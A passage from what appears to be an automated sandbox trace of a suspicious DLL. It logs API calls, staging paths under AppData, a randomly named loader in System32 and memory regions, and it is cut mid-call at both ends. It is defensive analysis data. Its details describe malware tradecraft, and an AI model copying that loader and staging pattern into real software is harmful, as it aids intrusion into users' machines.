out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0036.826] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0036.826] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0036.826] wsprintfA (in: param_1=0x26f7b8, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0036.827] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0036.827] wsprintfA (in: param_1=0x26f6b4, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0036.827] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0036.827] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0036.827] CloseHandle (hObject=0x74) returned 1 [0036.827] GetLastError () returned 0x0 [0036.827] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0036.827] GetLastError () returned 0x0 [0036.827] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0036.827] GetSystemDirectoryA (in: lpBuffer=0x26f7b8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0036.827] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0036.827] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0036.827] CloseHandle (hObject=0x74) returned 1 [0036.828] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0036.828] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0036.828] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0036.829] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0036.829] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0036.829] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0036.830] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0036.830] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0036.830] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0036.830] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0036.830] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0036.830] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0036.830] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0036.830] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0036.830] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0036.830] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0036.830] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0036.830] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0036.830] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0036.831] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0036.831] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0036.831] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0036.831] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0036.831] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0036.831] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0036.831] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0036.831] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0036.831] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0036.831] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0036.831] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0036.832] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0036.832] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0036.832] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0036.832] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0036.832] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0036.832] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0036.832] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0036.832] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0036.832] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0036.832] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0036.832] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0036.832] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0036.832] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0036.832] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0036.832] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0036.832] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0036.833] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0036.833] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0036.833] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0036.833] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0036.833] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0036.833] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0036.833] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0036.833] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0036.833] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0036.833] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0036.833] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0036.833] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0036.833] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0036.833] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0036.833] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0036.834] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0036.834] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0036.834] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0036.834] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.834] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.834] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.834] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0036.836] HeapDestroy (hHeap=0x870000) returned 1 Process: id = "71" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f6c0" os_pid = "0xea4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllUnregisterServer /fn_args=\"%Temp%\\IXP000.TMP\\\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3107 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3108 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3109 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3110 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 3111 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 3112 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3113 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3114 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3115 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 3116 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 3117 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3118 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3119 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 3120 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 3121 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3122 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3123 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3124 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3125 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3126 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3127 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3128 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3129 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3130 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3131 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3132 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 3133 start_va = 0x420000 end_va = 0x4e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3134 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3135 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3136 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3137 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 3138 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 3139 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 3140 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3141 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 3142 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3143 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3144 start_va = 0x600000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 3145 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3146 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3147 start_va = 0x7a0000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Thread: id = 159 os_tid = 0xea8 [0036.882] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf6c4 | out: lpSystemTimeAsFileTime=0x1cf6c4*(dwLowDateTime=0xe3abbaf0, dwHighDateTime=0x1d3dfba)) [0036.882] GetCurrentProcessId () returned 0xea4 [0036.882] GetCurrentThreadId () returned 0xea8 [0036.882] GetTickCount () returned 0x18564 [0036.882] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf6bc | out: lpPerformanceCount=0x1cf6bc*=379438771) returned 1 [0036.883] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.883] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0036.883] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0036.883] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0036.883] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0036.883] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.883] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.883] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.883] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.883] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.883] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.883] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.883] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.883] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.883] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.884] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.884] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.884] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.884] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.884] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.884] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.884] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.884] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.884] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.884] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.884] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.885] GetCurrentThreadId () returned 0xea8 [0036.885] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllUnregisterServer /fn_args=\"%Temp%\\IXP000.TMP\\\"" [0036.885] GetEnvironmentStringsW () returned 0x3379a0* [0036.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0036.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x7909f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0036.885] FreeEnvironmentStringsW (penv=0x3379a0) returned 1 [0036.885] GetStartupInfoA (in: lpStartupInfo=0x1cf614 | out: lpStartupInfo=0x1cf614*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0036.885] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0036.885] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0036.885] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0036.885] SetHandleCount (uNumber=0x20) returned 0x20 [0036.885] GetLastError () returned 0x0 [0036.885] SetLastError (dwErrCode=0x0) [0036.885] GetLastError () returned 0x0 [0036.885] SetLastError (dwErrCode=0x0) [0036.885] GetLastError () returned 0x0 [0036.885] SetLastError (dwErrCode=0x0) [0036.885] GetACP () returned 0x4e4 [0036.885] GetLastError () returned 0x0 [0036.885] SetLastError (dwErrCode=0x0) [0036.885] IsValidCodePage (CodePage=0x4e4) returned 1 [0036.886] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1cf5f4 | out: lpCPInfo=0x1cf5f4) returned 1 [0036.886] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1cf0c0 | out: lpCPInfo=0x1cf0c0) returned 1 [0036.886] GetLastError () returned 0x0 [0036.886] SetLastError (dwErrCode=0x0) [0036.886] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x1cf050 | out: lpCharType=0x1cf050) returned 1 [0036.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf4d4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf4d4, cbMultiByte=256, lpWideCharStr=0x1cee38, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.886] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x1cf0d4 | out: lpCharType=0x1cf0d4) returned 1 [0036.886] GetLastError () returned 0x0 [0036.886] SetLastError (dwErrCode=0x0) [0036.886] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0036.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf4d4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf4d4, cbMultiByte=256, lpWideCharStr=0x1cee08, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뉮矲狰Ā") returned 256 [0036.886] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뉮矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.886] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" 